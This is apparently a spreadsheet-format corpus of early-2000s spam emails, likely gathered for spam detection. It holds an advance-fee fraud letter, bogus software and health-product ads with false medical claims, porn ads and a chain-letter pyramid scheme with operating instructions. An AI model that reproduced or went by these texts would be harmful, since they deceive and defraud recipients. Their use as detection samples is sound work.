Thank you, and God bless.Best Regards,DR. SAMUEL  EBOKA.NOTE:- THAT YOU CAN USE THIS ALTERNATIVE EMAIL ADDRESSES:
samueleboka2@email.com , sameboka@uymail.com-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">Does Your Computer Need an Oil Change
Does Your Computer Need an Oil
      Change?
NortonSystemWorks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AntiVirusÃ¿FFFF99 2002 - THE #1
      ANTI-VIRUS PROTECION EVER!Norton UtilitiesÃ¿FFFF99 2002
      - DIAGNOSE ANY PROBLEM WITH YOUR
      SYSTEM!
Norton GhostÃ¿FFFF99 2002 - MAKES
      BACKING UP YOUR VALUABLE DATA EASY!
      Norton CleanSweepÃ¿FFFF99 2002 - CLEANS
      OUT EXCESS INTERNET FILE BUILDUP!
      Norton WinFaxÃ¿FFFF99 Basic - TURNS YOUR
      CPU INTO A FAX MACHINE!GoBackÃ¿FFFFAE 3 Personal - HELPS
      PREVENT YOU FROM MAKING ANY MISTAKES!
*ALL
      this has a retail price of $99.95*  Buy
      it
      Now for ONLY $29.99!with
      Free Shipping - PLUS, Buy
      Any 2 Items &amp; GET 1 FREE! (Also
      w/Free Shipping!) 
CLICK
      HERE to Order NOW!
This Product is available NOW. When we
run out it's gone, so get it while it's HOT!
Â 
Â 
Â 
Your
      email address was obtained from an opt-in list. Opt-in IAA (Internet
      Advertising Association)Â Approved ListÂ Serial
      Code FTRD4451.Â Â If you wish to be unsubscribed from
      this list, please Click
      here. We do not condone spam in any shape or form. Thank You kindly
      for your cooperation.
</t>
  </si>
  <si>
    <t xml:space="preserve">I am Mr.IKE EJOH. Bank Manager of Diamond Bank of Nigeria, Lagos Branch. I have urgent and very confidential business proposal for you. On June 6  1999 a FOREIGN Oil consultant/contractor with the FEDERAL MINISTRY OF AVIATIONMr. Barry Kelly made a numbered time (Fixed) Deposit for twelve calendar months, valued at US$25,000,000.00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Bank.This sum of US$25,000,000.00 is still sitting in my Bank and the interest is being rolled over with the principal sum at the end of each year. No one willever come forward to claim it.According to Nigerian Law, at the expiration of 6 (six) years, the money will revert to the ownership of the Nigerian Government if nobody applies to claim the fund. Consequently, i have just sucided in getting this fund sent to holland through a security company called GLOBAL&amp;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&amp;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country.Awaiting your urgent reply via my email: Thanks and regards. MR.IKE EJOH
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Consumers, Increase your Business Sales! How??By targeting millions of buyers via e-mail !! 25 MILLION EMAILS + Bulk Mailing Software For Only $150.00super low price! ACT NOW !!!Our Fresh Addresses Will Bring You Incredible Results! If you REALLY want to get the word out regardingyour services or products, Bulk Email is the BEST way to do so, PERIOD! Advertising in newsgroups is good but you're competing with hundreds even THOUSANDSof other ads. Will your customer's see YOUR ad in the midst of all the others?Free Classifieds? (Don't work)Web Site? (Takes thousands of visitors)Banners? (Expensive and iffy)E-Zine? (They better have a huge list)Search Engines? (Easily buried with thousands of others)Bulk Email will allow you to DIRECTLY contact yourpotential customers. They are much more likely totake the time to read about what you have to offer if it was as easy as reading it via email ratherthan searching through countless postings in newsgroups.The list's are divided into groups and are compressed. This will allow you to use the names right off the cd. ORDER IN THE NEXT 72 hours AND RECIEVE 4 BONUSES!!ORDER IN THE NEXT 48 HOURS AND RECIEVE FULL TECHNICAL SUPPORT !!!ACT NOW !!!!!!!!!!!!!!*BONUS #1 Receive an additional cd-rom with millions of fresh, deliverable general internet e-mail addresses free!! *BONUS #2 Receive 2000 how to books, reports and manuals on cd-rom withreprint resale rights! Produce for pennies and resell for BIG dollars! *BONUS #3 Receive the Mass Mailer bulk delivery software, with fulloperating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INFORMATION:CHECK BY FAX SERVICES OR CREDIT CARD INFO: O R D E R N O W . . . SAME DAY SERVICE (M-F) if your orderis received before 3pm Central . To place an order, you can call us at: 1-308-650-5905 ext 121 Are fax your order to 1-415-873-2700   This Number is for credit Card Orders Only!!!CHECK BY FAX SERVICES! __________________________________________To order, via credit card simply cut/paste and print out theEZ ORDER FORM below and fax to our office today. ***** NOW ONLY $150! *****This "Special Price" is in effect for the next seven days,after that we go back to our regular price of $250.00 ...Don't delay... you can be in business tomorrow! We accept Visa, Mastercard, Amex, Disc and Checks by Fax.----------------------Cut &amp; Paste-------------------------------------------EZ Order Form---------------------_____Yes! I want everything! I am ordering within 72 hours.Include my FREE "Business On A Disk" bonus along with your Millions of E-Mail addresses on CD (plus 1,093,808 bonus addresses)for the special price of only $150.00 + shipping as indicatedbelow._____Yes! I missed the 72 hour special, but I am orderingCD WITH, super clean e-mail addresses within 7 days for the"special" price of only $250.00 + s&amp;h._____Oop's I missed the 72 hour and 7 day "specials". I amordering The Cd at the regular price of $250.00 + s&amp;h.***PLEASE SELECT YOUR SHIPPING OPTION***____I would like to receive my package FedEx OVERNIGHT. I amincluding $15 for shipping. (Hawaii &amp; Alaska $20 - Canada $25,all other International add an *additional* $25 [$40 total] for shipping)____I would like to receive my package FedEx 2 DAY delivery.I'm including $10 for shipping. (Sorry no Canada or Internationaldelivery - Continental U.S. shipping addresses only)***Please Print Carefully***NOTE: Orders cannot be shipped without complete informationincluding your signature. No exceptions!NAME____________________________________________________COMPANY NAME____________________________________________ADDRESS_________________________________________________(FedEx can only ship to street addresses - no P.O. boxes)CITY, STATE, ZIP________________________________________PHONE NUMBER____________________________________________(required for shipping &amp; tracking) EMAIL ADDRESS___________________________________________(Print Carefully - required in case we have a question and tosend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SIGNATURE:x_________________________________I understand that I am purchasing the e-mail address on CD,and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orderis received before 3pm Central . To place an order, you can call us at: 1-308-650-5905 ext 121 Are fax your order to1-415-873-2700 This Number is for credit Card Orders Only!!!CHECK BY FAX SERVICES!If you would like to fax a check, paste your check below and fax it to our office along with the EZ Order Form forms to: 1-415-873-2700 *************************************************************24 HOUR FAX SERVICES*** PLEASE PASTE YOURCHECK HERE AND FAX IT TO US AT 1-415-873-2700   **********************************************************If You fax a check, there is no need for you to mail theoriginal. We will draft a new check, with the exactinformation from your original check. All checks will beheld for bank clearance. (7-10 days) Make payable to: "S.C.I.S" -=-=-=-=--=-=-=-=-=-=-=offlist  Instructions=-=-=-=-=-=-=-=-=-=-=-=----------------------------------------------------------------------
Do not reply to this message - 
To be off from future mailings:
mailto:trudymail2002@themail.com?Subject=offitnow
</t>
  </si>
  <si>
    <t xml:space="preserve">FREE 30 day supply of HGH 1000:
Look Younger and Lose Weight in 3 Weeks!!!!As seen on NBC, CBS, CNN, and Oprah! The health discovery 
that actually reverses aging while burning fat, without
dieting or exercise! This proven discovery has been reported
on by the New England Journal of Medicine. Forget aging and
dieting forever!  And it's Guaranteed!http://w%77%77%2e%74%65%72%72%61%2ee%73/pe%72%73o%6E%61%6C9/starfish103/Would you like to lose weight while you sleep?
                     No dieting!
                  No hunger pains!
                    No Cravings!
               No strenuous exercise!
              Change your life forever!                    100% GUARANTEEDhttp://w%77%77%2e%74%65%72%72%61%2ee%73/pe%72%73o%6E%61%6C9/starfish103/AOL Users click
 HERETo be removed, reply to this email with REMOVE in the SUBJECT line.
</t>
  </si>
  <si>
    <t>HI,  zzzz@spamassassin.taint.org   today,
Ink Price________________________________________________________________________________________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</si>
  <si>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New Page 1
Finally, 
      a  Newsfeed  that delivers current and 
      relevant Sales, Marketing &amp; Advertising Articles from 
      such magazines as Business 2.0, FAST Company, Technology
      Marketing, Wired, PC World, Asia Street Intelligence, Inc, Bank Technology...
      All in one location &amp; it's free. Sign up today.  
Easy 
      to read.Â  Easy to use.Â  Easy on your time.  
Providing 
      the Internets' most 
      comprehensive Web Directory for Sales,
      Marketing &amp; Advertising Executives.
Today's 
      top business magazine reviews along with a wide selection of articles from 
      relevant sales and marketing topics. 
Gain 
      access to all the suppliers and 
      resources you need to do your job effectively.
If 
      you can't find the supplier or resource
      that you need ... one of our Reps will 
      go to work to find it for you.
Business 2.0, FAST Company, Technology Marketing,  Wired, PC World,  Asia Street Intelligence, Inc,  Bank Technology and MoreÂ 
You are receiving this e-mail because you have opted-in to receive special offers from
        OffersRus.net or one of it's marketing affiliates. If you feel you have received this e-mail in error or do not wish to receive additional special offers, please scroll down to unsubscribe.
Â 
This E-mailing has been sent to you as a person interested in the information enclosed. This E-mail is not SPAM under the Federal Regulatory laws of the United States. This message is being sent to you in compliance with the proposed Federal Legislation for commercial e-mail (H.R.4176-SECTION 101 PARAGRAPH (e) (1) (A)) and Bill s.1618 TITLE III passed by the 105th US Congress. We sincerely apologize for any inconvenience. This message is not intended for residents of WA, NV, CA, &amp; VA. Screening of addresses has been done to the best of our technical ability. If you are a California, Nevada, Washington, or Virginia resident please follow the instructions below and you will be permanently removed from our list immediately.        If you would like to be removed from our E-Mail list, please click on the words
REMOVE ME
click send, and you will be removed from our list immediately.
        Â 
Â 
Â ubyrpqtetxjyuyqyfjtie</t>
  </si>
  <si>
    <t xml:space="preserve">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you.Take your FREE test drive and have the next 400  
below you!mailto:workinathome@btamail.net.cn?subject=more_MOSS3_info_please
Be sure to request info if the subject line does not! All the best,Daniel
Financially Independent Home Business Owner______________________________________________________
To be excluded from future notices:
mailto:guaranteed4u@btamail.net.cn?subject=exclude  </t>
  </si>
  <si>
    <t xml:space="preserve">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go:http://www.basetel.com:27000/wealthnowWe are looking for energetic and self motivated people.  If that is you
than click on the link and fill out the form, and one of our
employement specialist will contact you.To be removed from our link simple go to:http://www.basetel.com:27000/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">To be removed please click here or simply respond to this email. Your address will be removed and blocked from ever being added again. 
Please scroll down to the bottom of this email for more details.Tricams Live Cam GirlsALL THESE SHOWS ARE LIVE RIGHT NOW! Ahotsexycouple Sensuality Candice
 Sui_lei Wild_cat Azcple
What in the world are you waiting for?  Click now and tell any of these women what to do for you live on camera.  Don't be shy, just signup for free and tell them what you want and you will get.
CLICK HERE FOR THE FREE LIVE SHOW!
This is our central mailing for all of our affiliate sites.  If you have a question on how you got on, please email us and we will be glad to help.
The fastest way to get off our list is to click this link.  If you do not have access to it, please respond to this email. 
Please make sure to include this email address as it is the one on our list. zzzz@spamassassin.taint.org 
</t>
  </si>
  <si>
    <t xml:space="preserve">Would You Like to Save up to 80
 Would You Like to
       Save up to 80%
      on Printer, Fax
      &amp;  Copier Supplies?
On
        Brands Like -&gt;
EPSON
Canon
HEWLETT
        PACKARD
Lexmark
&amp;
        more!
100%
        Quality Satisfaction Guarantee or Your Money Back!
FREE
        Same Day shipping on all US Orders*
BEST
        Prices on the Internet - GUARANTEED!**
Click
        Here to ORDER NOW!
OR
        Call us Toll-Free at 1-800-758-8084!Â 
Â 
*Free Shipping only on
        orders of $40 or more.**We beat any online retailer's price by 5%.
        Call us with the URL (Website) advertising the lower price and once we
        verify the price, we will beat it by 5%!
You
        are receiving this special offer because you have provided permission to
        receive email communications regarding special online promotions or
        offers. If you feel you have received this message in error, or wish to
        be removed from our subscriber list, Click
        HERE . Thank You and we apologize for ANY inconvenience.
</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve">
 This WEEK: Sydney Bares ALL in the park!
Join her in our Live Teen Chat!Watch as Sandy Strips Naked in her Dorm!
Best of All, see it 
ALL 4 FREE!Don't Miss Out! Watch in Awe as Stacey Suck-Starts Ken!
AND OUR BONUS:
Pam &amp; Tommy UNCUT!
Penthouse Forum Stories!
Jenna Jamieson in JennaMaxx!!Get in here for FREE NOW!</t>
  </si>
  <si>
    <t>How are you doing?If you've been like me, you've been trying almost
EVERYTHING to lose weight.Â  I know how you feel
- the special diets, miracle pills, and fancy exercise 
equipment never helped me lose the pounds I needed to lose
either.Â  It seemed like the harder I worked at it, the less
weight I lost - until I heard about 'Extreme Power Plus'.You're probably thinking to yourself, "Oh geez, not another
miracle diet pill!"Â  Like you, I was skeptical at first, but 
my sister said it helped her lose 23 pounds in just 2 weeks, 
so I told her I'd give it a try.Â  I mean, there was nothing 
to lose except a lot of weight!Â  Let me tell you, it was
the best decision I've ever made.  PERIOD.  Six months later,
as I'm writing this message to you, I've gone from 355 pounds
to 210 pounds, and I haven't changed my exercise routine or diet
at all.Â  Yes, I still eat pizza, and lots of it!I was so happy with the results that I contacted the manufacturer
and received permission to resell it - at a HUGE discount.Â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day.Â  
Just try it for one month - there's pounds to lose and confidence 
to gain!Â  You will lose weight fast - GUARANTEED.Â  This is my
pledge to you.BONUS! Order NOW &amp; get FREE SHIPPING on 3 bottles or more!Â  To order Extreme Power Plus on our secure server, just click
on this link -&gt; http://www.modernherbals.com/To see what some of our customers have said about this product, 
visit http://www.modernherbals.com/testimonials.aspTo see a list of ingredients and for more information
on test studies and how it will help you lose weight, visit 
http://www.modernherbals.com/ingre1.asp*****************************************************************
If you feel that you have received this email in error, please 
click here -&gt; http://www.moderherbals.com/remove.asp  to request
to be removed. Thank you, and we apologize for any inconvenience.
*****************************************************************</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, zzzz@neilgarner.comAs seen on NBC, CBS, and CNN, and even Oprah!  The health
discovery that actually reverses aging while burning fat,
without dieting or exercise!  This proven discovery has even
been reported on by the New England Journal of Medicine.
Forget aging and dieting forever!  And it's Guaranteed!* Reduce body fat and build lean muscle WITHOUT EXERCISE!
* Enhace sexual performance
* Remove wrinkles and cellulite
* Lower blood pressure and improve cholesterol profile
* Improve sleep, vision and memory
* Restore hair color and growth
* Strengthen the immune system
* Increase energy and cardiac output
* Turn back your body's biological time clock 10-20 years
in 6 months of usage !!!
FOR FREE INFORMATION AND GET FREE 
1 MONTH SUPPLY OF HGH CLICK HERE
You are receiving this email as a subscriber
to the Opt-In America Mailing List. 
To remove yourself from all related maillists,
just  
Click Here
</t>
  </si>
  <si>
    <t xml:space="preserve">Fist Bang FPA 
 Fist 
        Bang will show you everything you always wanted to see and could only 
        dream about!   Disclaimer:We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 </t>
  </si>
  <si>
    <t xml:space="preserve">
 Check out our $1,000.00 internet challenge!
\tab \tab \'b7 What if you could have a protected job that allows you to work as
little as two hours a week and it still pays you up to $800.00 every week for the next 20 years? Well - Here it is!Take our $1,000.00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href="http://www.bti-marketing.net/remove.html"&gt;click here and enter your email address. Thanks for your positive assistance.</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</si>
  <si>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heretbeyer
</t>
  </si>
  <si>
    <t xml:space="preserve">Norton AD
Take
      Control of Your Computer With This Top-of-the-Line Software!Norton
            SystemWorks 2002  Software Suite
            -Professional Edition-
Includes
            Six - Yes 6! 
            - Feature-Packed UtilitiesALL for 1
            Special LOW
            Price of Only
            $29.99!
This
            Software Will:Â -
            Protect your computer from unwanted and  hazardous  virusesÂ -
            Help secure your private &amp; valuable informationÂ - Allow
            you to transfer files and send e-mails  safelyÂ -
            Backup your ALL your data quick and easilyÂ - Improve your
            PC's performance w/superior
            integral diagnostics!Â - You'll NEVER have to take your
            PC to the repair shop AGAIN!Â 
6
            Feature-Packed Utilities
            1
            Great Price 
            A $300+  
            Combined Retail Value
YOURS  for
            Only $29.99!&lt;
            Price Includes FREE
Shipping! &gt;And
            For a Limited time Buy Any 2 of Our Products &amp; Get 1 Free!
 Don't fall
    prey to destructive viruses or hackers!ProtectÂ  your computer and
    your valuable information and
-&gt;
            CLICK HERE to Order Yours NOW! &lt;-
Your email
      address was obtained from an opt-in list. Opt-in UEFAS (United Email
      Federation Against Spam) Approved List - Â Purchase Code #
      8594030.Â Â If you wish to be unsubscribed from this list, please Click
      here . If you have previously unsubscribed and are still receiving
      this message, you may email our Spam
      Abuse Control Center. We do not condone spam in any shape or form.
      Thank You kindly for your cooperation.
</t>
  </si>
  <si>
    <t xml:space="preserve">iieo
Mortgage companies make you wait
      Mortgage companies make you wait...They Demand to Interview you...They 
      Intimidate you...They Humiliate you...And All of That is While 
      They Decide If They Even Want to Do Business With You...
We Turn the 
      Tables on Them...
      Now, You're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1/4 of 1% Drop in your rate!
Â Â       CLICK HERE FOR THE FORM
You 
      will be contacted with an offer within 24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xcps
</t>
  </si>
  <si>
    <t xml:space="preserve">67% of women desire a "bigger" man...
&gt;&gt;From the Creator of Longitude comes SizeMAX-
The most powerful penis enlargement pill on the market!GO BIG... SATISFY HER BETTER THAN ANY MAN CAN!!!
OVER 120,000,000 CAPSULES SOLD!!!. Do you want a larger and firmer penis?
. Do you want to give your partner more pleasure?
. Do you want to stay ROCK HARD longer? Our Revolutionary Pill Can Enlarge Your Penis
Up to 3-FULL-INCHES. 100% GUARANTEED! Believe it or not, it is now possible.
Check out dramatic before and after photos and what JANE Magazine had to
say about the breakthrough SizeMAX formula...CLICK HERE
Â 
Â 
for no further emails click here [^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t>All our mailings are sent complying to the proposed H.R. 3113 Unsolicited
Commercial Electronic Mail Act of 2000. Please see the bottom of this
message for further information and removal instructions.
PARENTS OF 15 - YEAR OLD - FIND $71,000 CASH HIDDEN IN
HIS CLOSET!Does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labelled piles."My first thought was that he had robbed a bank", says the 41-year-old
woman, "There was over $71,000 dollars in that bag --that's more than my
husband earns in a year".The woman immediately called her husband at the car-dealership where
he worked to tell him what she had discovered.He came home right away
and they drove together to the boys school and picked him up.  Little did
they suspect that where the money came from was more shocking than
actually finding it in the closet.As it turns out, the boy had been sending out, via E-mail, a type of 
"Report" to E-mail addresses that he obtained off the Internet. Everyday
after school for the past 2 months, he had been doing this right on his
computer in his bedroom."I just got the E-mail one day and I figured what the heck, I put my name
on it like the instructions said and I started sending it out", says the clever
15-year-old.The E-mail letter listed 5 addresses and contained instructions to send one
$5 dollar bill to each person on the list, then delete the address at the top
and move the others addresses Down , and finally to add your name to
the top of the list.The letter goes on to state that you would receive several thousand
dollars in five-dollar bills within 2 weeks if you sent out the letter with your
name at the top of the 5-address list. "I get junk E-mail all the time, and
really did not think it was going to work", the boy continues.Within the first few days of sending out the E-mail, the Post Office Box
that his parents had gotten him for his video-game magazine subscriptions
began to fill up with not magazines, but envelopes containing $5 bills."About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homework".He had also been riding his bike
to several of the banks in his area and exchanging the $5 bills for twenties, 
fifties and hundreds."I didn't want the banks to get suspicious so I kept riding to different banks
with like five thousand at a time in my backpack. I would usually tell the
lady at the bank counter that my dad had sent me in to exchange the
money] and he was outside waiting for me.One time the lady gave me a
really strange look and told me that she would not be able to do it for me
and my dad would have to come in and do it, but I just rode to the next
bank down the street (laughs)."  Surprisingly, the boy did not have any
reason to be afraid.The reporting news team examined and investigated the so-called "chain-letter" the boy was
sending out and found that it was not a chain-letter at all.In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received.Every five-dollar bill that he received contained a little note that read,
"Please send me report number XYX".This simple note made the letter
legal because he was exchanging a service (A Report on how-to) for a 
five-dollar fee.[This is the end of the media release. If you would like to understand how
the system works and get your $71,000 - please continue reading. What 
appears below is what the 15 year old was sending out on the net -
 YOU CAN USE IT TOO - just follow the simple instructions].+++++++++++++++++++++++++++++++++++++++++++++++++++
BE FINANCIALLY FREE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megabucks with only $25 out of pocket cost".
DUE TO THE RECENT INCREASE OF POPULARITY &amp; RESPECT THIS
PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER
THAN EVER.
Note* follow the directons below, I had best results the second time when
I hired a bulk email service in addition to following the reports instructions.In order for all of us to be successful, many, many emails must be sent so
that the returns are many. I have been extremely successful using the
following company. They send out the offers, and all I do is accept money
for reports, then I send back to the people as soon as possible.This is what one had to say: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in".Pam Hedland, Fort Lee, New Jersey.+++++++++++++++++++++++++++++++++++++++++++++++++++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first,PRINT THIS NOW FOR YOUR FUTURE REFERENCE++++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you order each of the 5 reports.
You will need all 5 reports so that you can save them on your computer.
Within a few days you will receive, vie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"1 through 6" or you will loose out on majority of
your profits. Once you understand the way this works, you will also see
how it does not work if you change it. Remember, this method has been
tested, and if you alter, it will NOT work!!!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#5.
3.... Move the name &amp; address in REPORT # 3 down TO REPORT #4.
4.... Move the name &amp; address in REPORT # 2 down TO REPORT #3.
5.... Move the name &amp; address in REPORT # 1 down TO REPORT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#1: BY SENDING BULK E-MAIL LEGALLY
+++++++++++++++++++++++++++++++++++++++++++++++++++
Let's say that you decide to start small, just to see how it goes, and we will
assume You and those involved send out only 5,000e-mails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 equals
100 people responded and ordered Report # 2.Those 100 people mail out 5,000 e-mails each for a total of 500,000 e-mails.
The 0.2% response to that is 1000 orders for Report #3.Those 1000 people send out 5,000 e-mails each for a total of 5 million
e-mails sent out. The 0.2% response to that is 10,000 orders for Report #4.Those 10,000 people send out 5,000 e-mails each for a total of
50,000,000 (50 million) e-mails. The 0.2% response to that is 100,000
orders for Report #5. THAT'S 100,000 ORDERS TIMES
$5 EACH=$500,000.00 (half million). Your total income in this example is:
1..... $50 +2.....$500 + 3.....$5,000 + 4..... $50,000 + 5..... $500,000.......
Grand Total=$555,550.00
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#2: BY PLACING FREE ADS ON THE INTERNET
+++++++++++++++++++++++++++++++++++++++++++++++++++
Advertising on the net is very very inexpensive and there are hundreds of
FREE places to advertise. Placing a lot of free ads on the Internet will
easily get a larger response.
We strongly suggest you start with Method #1 and add METHOD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report.=ORDER EACH REPORT BY ITS NUMBER &amp; NAME ONLY. Notes: Always
send $5 cash (U.S. CURRENCY) for each Report. Checks NOT
accepted. Make sure the cash is concealed by wrapping it in at least 2
sheets of paper or aluminum foil. On one of those sheets of paper, Write
the NUMBER &amp; the NAME of the Report you are ordering, YOUR E-MAIL 
ADDRESS and your name and postal address.
PLACE YOUR ORDER FOR THESE REPORTS NOW:
+++++++++++++++++++++++++++++++++++++++++++++++++++
REPORT #1: The Insider's Guide to Advertising for Free on the NetOrder Report #1 from:
R. R.
PO Box 18048
Chicago, IL 60618
__________________________________________________________REPORT #2: The Insider's Guide to Sending Bulk e-mail on the NetOrder Report #2 from:
GM Boland
353 Jonestown Rd. Suite 125
Winston Salem, NC 27104
__________________________________________________________REPORT #3: Secret to Multilevel marketing on the NetOrder Report #3 from:
R. Chernick
PO Box 771661
C.S. Florida 33077
__________________________________________________________REPORT #4: How to become a millionaire utilizing MLM &amp; the NetOrder Report #4 from:
M. Eiseman
PO Box 451971
Sunrise, Florida 33345-1971
____________________________________________________REPORT #5: How to send out 0ne Million emails for freeOrder Report #5 From:
L.Samon
PO BOX 31
Castletown
Isle of Man
IM 99 5XP+++++++++++++++++++++++++++++++++++++++++++++++++++
$$$$$$$$$$$$$$$$ YOUR SUCCESS GUIDELINES $$$$$$$$$$$$$$$$Follow these guidelines to guarantee your success:+++ If you do not receive at least 10 orders for Report #1 within 2 weeks,
continue sending e-mails until you do. =orders, 2 to 3 weeks after that you should receive 100 orders or more for
REPORT #2. If you did not, continue advertising or sending e-mails until
you do.+++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Report#1 and moved others to #2 thru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$ 147,200.00....all cash! I was shocked.
I have joined Jody in her "hobby".Mitchell Wolf, Chicago, Illinois+++++++++++++++++++++++++++++++++++++++++++++++++++
"Not being the gambling type, it took me several weeks to make up my
mind to participate in this plan. But conservative that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weeks".Susan De Suza, New York, N.Y+++++++++++++++++++++++++++++++++++++++++++++++++++
If you have any questions of the legality of this program, contact the Office
of Associate Director for Marketing Practices, Federal Trade Commission,
Bureau of Consumer Protection, Washington,D.C.
+++++++++++++++++++++++++++++++++++++++++++++++++++This email was sent to you via Saf-E Mail Systems. Your email address was
automatically inserted into the To and From addresses to eliminate
undeliverables which waste bandwidth and cause internet congestion. Your
email or webserver IS NOT being used for the sending of this mail. No-one
else is receiving emails from your address. You may utilize the removal link
below if you do not wish to receive this mailing.
http://www.webtransit.net/remove.html</t>
  </si>
  <si>
    <t xml:space="preserve"> 
                 Do You Want To Teach and Grow Rich?If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annually.Many are called, few are chosen.  This opportunity will be limited to one qualified individual per state.  Make the call and call the 24 hour pre-recorded message number below.  We will take as much or as little time as you need to see if this program is right for you.                            *** 801-296-4140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801-296-4140 *** 
_______________________________________________________________ 
*To be taken out of this database: 
  benno5@witty.com  7783rMXA7-171LWkK6405nYqr3-290bTQi2365AwLL8-360bRcX5658nxuv3-0l58
4375WCTg4-101pbkG3860ZiOn2-152xcTA8770NGxl9-322sHBy6554mHhn1-223Hl61</t>
  </si>
  <si>
    <t xml:space="preserve">Nationwide PC Repairs and Upgrades*No call out charges.
*No hourly charges.
*Picked up from your home and returned safely anywhere in the UK.
*Diagnosed and repaired by certified engineer
*We will meet and beat any priceFor more information click on the link below;http://www.qpas.co.uk/pcclinic.htm
</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve">
Natures Own
Free Introductory Offer!
Mother Nature's own all natural Viagra
Men's and Women's Formula
Increased SensationIncreased Frequency
Increased PleasureIncreased Desire
Increased StaminaIncreased LibidoClaim your Introductory Offer !
To stop receiving future offers
Click Here
</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</si>
  <si>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Mark R Sherman P.S. Someone recently sent the letter to me and it has been the most eye-opening, financially beneficial information I have ever received. I honestly believe that you will feel the same way once you've read it. And it's FREE! 
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">
Â  
Beautiful Custom 
            Websites, $399 Complete!Â Get a beautiful, 100% Custom Web SiteÂ (or 
                  yours redesigned)Â for only $399!*We 
                  have references coast to coastÂ and will give you 
                  plenty of sites to 
              view!
Includes up to 7 pages (you can add 
                        more), java rollover buttons, feedback forms, more. It 
                        will be constructed to your taste and 
                        specifications,Â we do not use templates.Â  
                        Our sites are completely 
                        custom.Â Â Â  *Must host with us @ 
                        $19.95/mo (100 Megs, 20 Email accounts, Control Panel, 
                        Front Page, Graphical Statistics, 
                        more).
For sites to view, complete below or call our 
                        message center at321-726-2209 (24 hours). Your call 
                        will be returned promptly.NOTE:Â  If 
                        you are using a web based email program (such as Yahoo, 
                        Hotmail,etc.) the form below will not 
                        work.Â  Instead of 
                        using the form,Â  CLICK 
                        HERE (You
                        must include your name, phone and state to get a
                        response, no exceptions.
Â Name: Phone 
                              w/AC*:State: Â Type Project: New 
                              Site:RedesignÂ Â  Current 
                              site?:Â Comments:Â Â Your information is neither sold nor shared 
                              with third parties under any 
                              circumstance.To be eliminated from 
                              future mailings, Click 
                              Here[6560Icum3-199GYQK9350cvpH2-701z@29]
</t>
  </si>
  <si>
    <t xml:space="preserve">Norton AD
Take
      Control of Your Computer With This Top-of-the-Line Software!Norton
            SystemWorks 2002  Software Suite
            -Professional Edition-
Includes
            Six - Yes 6! 
            - Feature-Packed UtilitiesALL for 1
            Special LOW
            Price of Only
            $29.99!
This
            Software Will:Â -
            Protect your computer from unwanted and  hazardous  virusesÂ -
            Help secure your private &amp; valuable informationÂ - Allow
            you to transfer files and send e-mails  safelyÂ -
            Backup your ALL your data quick and easilyÂ - Improve your
            PC's performance w/superior
            integral diagnostics!Â - You'll NEVER have to take your
            PC to the repair shop AGAIN!Â 
6
            Feature-Packed Utilities
            1
            Great Price 
            A $300+  
            Combined Retail Value
YOURS  for
            Only $29.99!&lt;
            Price Includes FREE
Shipping! &gt;And
            For a Limited time Buy Any 2 of Our Products &amp; Get 1 Free!
 Don't fall
    prey to destructive viruses or hackers!ProtectÂ  your computer and
    your valuable information and
-&gt;
            CLICK HERE to Order Yours NOW! &lt;-
or Call
      Toll-Free 1-800-861-1481!
Your email
      address was obtained from an opt-in list. Opt-in UEFAS (United Email
      Federation Against Spam) Approved List - Â Purchase Code #
      8594030.Â Â If you wish to be unsubscribed from this list, please Click
      here . If you have previously unsubscribed and are still receiving
      this message, you may email our Spam
      Abuse Control Center. We do not condone spam in any shape or form.
      Thank You kindly for your cooperation.
</t>
  </si>
  <si>
    <t xml:space="preserve">THE ULTIMATE WAY TO WORK FROM HOME 
THE BEST MONEY MAKING SYSTEM OF ALL!! 
AS SEEN ON NATIONAL TV 
As seen on 20/20 and many other credible references. This is NOT a scam. 
I hope this is ok that I send you this. If you aren't interested, just 
simply delete it. 
READ THIS MESSAGE if you are like me and want more than your lousy 
weekly paycheck. Make more in a few months than last year at work. 
Believe it, work it. 
This really works, don't make the same mistake I made. I deleted this 
4-5 times before finally giving it a try. Within 2 weeks the orders 
(money) 
started coming in just like the plan below said it would. Give it a 
try!! 
You will be glad you did. 
Thanks and Good Luck! You won't need luck, just keep reading. Don't 
delete this!!! 
------------------------------------------------------ 
First read about how a 15 year old made $71,000. See below.... 
AS SEEN ON NATIONAL TV: This is the media report.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labeled piles. 
"My first thought was that he had robbed a bank", 
says the 41-year-old woman, "There was over $71,000 
dollars in that bag -- that's more than my husband 
earns in a year". 
The woman immediately called her husband at the 
car-dealership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 He had also 
been riding his bike to several of the banks in his 
area and exchanging the $5 bills for twenties, fifties 
and hundreds. 
"I didn't want the banks to get suspicious so I kept 
riding to different banks with like five thousand at a 
time in my backpack. I would usually tell the lady at 
the bank counter that my dad had sent me in to 
exchange the money and he was outside waiting for me. 
One time the lady gave me a really strange look and 
told me that she would not be able to do it for me and 
my dad would have to come in and do it, but I just 
rode to the next bank down the street (laughs)." 
Surprisingly, the boy did not have any reason to be 
afraid. The reporting news team examined and 
investigated the so-called "chain-letter" the boy was 
sending out and found that it was not a chain-letter 
at all. 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 
Every five-dollar bill that he received contained a 
little note that read, "Please send me report number 
XYX".This simple note made the letter legal because he 
was exchanging a service (A Report on how-to) for a 
five-dollar fee. 
[This is the end of the media release. If you would 
like to understand how the system works and get your 
$71,000 - please continue reading. What appears below 
is what the 15 year old was sending out on the net - 
YOU CAN USE IT TOO - just follow the simple 
instructions]. 
THANKS TO THE COMPUTER AGE AND THE INTERNET ! 
================================================== 
You will Make over half million dollars every 4 to 5 months from your 
home!!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wallaa ..... 3 weeks later the money started to 
come 
in. First month I only made $240.00 but the next 2 months after that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 Take this entire letter, with the modified list of names, and save it 
on your computer. DO NOT MAKE ANY OTHER CHANGES. 
Save this on a disk as well just in case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out 5,000 e-mails each for a total of 5 
million e-mails sent out. The 0.2% response to that is 10,000 orders 
